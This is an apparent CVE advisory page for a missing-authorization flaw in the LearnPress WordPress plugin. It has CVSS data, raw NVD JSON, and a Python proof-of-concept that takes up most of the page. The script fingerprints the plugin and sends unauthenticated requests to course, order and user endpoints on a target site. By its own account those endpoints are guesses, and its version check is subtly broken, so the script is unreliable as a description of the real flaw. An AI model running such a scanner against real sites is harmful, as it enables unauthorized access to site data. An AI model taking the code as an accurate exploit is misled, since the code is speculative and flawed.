Security Vulnerability Report
中文
CVE-2025-66054 CVSS 7.5 HIGH

CVE-2025-66054

Published: 2025-12-18 08:16:15
Last Modified: 2026-04-27 18:16:31
Source: [email protected]

Description

Missing Authorization vulnerability in ThimPress LearnPress learnpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LearnPress: from n/a through <= 4.2.9.4.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

No configuration data available.

LearnPress <= 4.2.9.4 (所有版本至4.2.9.4)
LearnPress: from n/a through <= 4.2.9.4

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-66054 PoC - LearnPress Missing Authorization # This PoC demonstrates the access control vulnerability in LearnPress plugin # Target: WordPress site with LearnPress <= 4.2.9.4 import requests import sys import re def check_learnpress_version(target_url): """Check if target is running LearnPress and get version""" print(f"[*] Scanning target: {target_url}") # Common paths to check for LearnPress paths = [ '/wp-content/plugins/learnpress/learnpress.php', '/wp-content/plugins/learnpress/assets/js/dist/learnpress.js', '/?rest_route=/learnpress/v1/', ] for path in paths: try: response = requests.get(target_url + path, timeout=10, verify=False) if response.status_code == 200: # Try to extract version version_match = re.search(r'version[\s]*:[\s]*["\']([\d.]+)', response.text) if version_match: return version_match.group(1) return "Detected (version unknown)" except requests.RequestException: pass return None def exploit_missing_auth(target_url): """ Exploit CVE-2025-66054 - Missing Authorization in LearnPress This attempts to access protected endpoints without authentication """ print("\n[*] Testing for Missing Authorization vulnerability...") # Potential vulnerable endpoints (based on typical LearnPress REST API) vulnerable_endpoints = [ '/?rest_route=/learnpress/v1/courses', '/?rest_route=/learnpress/v1/lessons', '/?rest_route=/learnpress/v1/orders', '/?rest_route=/learnpress/v1/users', '/wp-json/learnpress/v1/courses', '/wp-json/learnpress/v1/lessons', '/wp-json/learnpress/v1/orders', ] results = [] for endpoint in vulnerable_endpoints: try: url = target_url.rstrip('/') + endpoint # Request without authentication headers response = requests.get(url, timeout=10, verify=False) if response.status_code == 200: # Check if response contains sensitive data try: data = response.json() if data: print(f"[!] VULNERABLE: {endpoint}") print(f" Status: {response.status_code}") print(f" Response contains data: {len(str(data))} bytes") results.append({ 'endpoint': endpoint, 'status': response.status_code, 'vulnerable': True }) except: if 'wp-admin' in response.text or 'admin' in response.text.lower(): print(f"[!] POTENTIALLY VULNERABLE: {endpoint}") results.append({ 'endpoint': endpoint, 'status': response.status_code, 'vulnerable': 'potential' }) elif response.status_code == 401 or response.status_code == 403: print(f"[+] PROTECTED: {endpoint} (Status: {response.status_code})") else: print(f"[*] Endpoint: {endpoint} (Status: {response.status_code})") except requests.RequestException as e: print(f"[-] Error testing {endpoint}: {e}") return results def main(): if len(sys.argv) < 2: print("Usage: python cve-2025-66054-poc.py <target_url>") print("Example: python cve-2025-66054-poc.py https://example.com") sys.exit(1) target_url = sys.argv[1] # Suppress SSL warnings for testing requests.packages.urllib3.disable_warnings() # Check if LearnPress is installed version = check_learnpress_version(target_url) if version: print(f"[+] LearnPress detected: {version}") # Check if version is vulnerable (<= 4.2.9.4) if version != "Detected (version unknown)": version_parts = version.split('.') major, minor, patch = int(version_parts[0]), int(version_parts[1]), int(version_parts[2]) if len(version_parts) > 2 else 0 if major < 4 or (major == 4 and minor < 2) or (major == 4 and minor == 2 and patch <= 9): print(f"[+] Version {version} is potentially vulnerable ( <= 4.2.9.4)") else: print(f"[-] Version {version} may not be vulnerable") else: print("[-] LearnPress not detected or site not reachable") # Attempt exploitation results = exploit_missing_auth(target_url) if any(r.get('vulnerable') for r in results): print("\n[!] VULNERABILITY CONFIRMED!") print("[*] Recommendation: Update LearnPress to version > 4.2.9.4") else: print("\n[-] No obvious vulnerability detected (manual verification recommended)") if __name__ == "__main__": main()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-66054", "sourceIdentifier": "[email protected]", "published": "2025-12-18T08:16:15.027", "lastModified": "2026-04-27T18:16:31.330", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Missing Authorization vulnerability in ThimPress LearnPress learnpress allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects LearnPress: from n/a through <= 4.2.9.4."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-862"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Plugin/learnpress/vulnerability/wordpress-learnpress-plugin-4-2-9-4-broken-access-control-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.